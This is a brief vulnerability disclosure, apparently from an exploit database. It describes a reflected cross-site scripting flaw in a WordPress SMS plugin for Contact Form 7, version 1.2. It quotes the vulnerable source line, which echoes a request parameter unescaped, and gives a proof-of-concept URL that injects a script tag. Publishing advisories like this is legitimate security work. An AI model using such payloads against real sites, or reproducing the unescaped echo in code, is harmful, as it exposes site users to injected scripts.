[-] Title : International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting
[-] Author : Milad Karimi
[-] Vendor : https://wordpress.org/plugins/cf7-international-sms-integration/
[-] Category : Webapps
[-] Date : 2020-10-27
Vulnerable Page:
/class-sms-log-display.php
Vulnerable Source:
366: echo echo $_REQUEST['page'];
Exploit:
http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>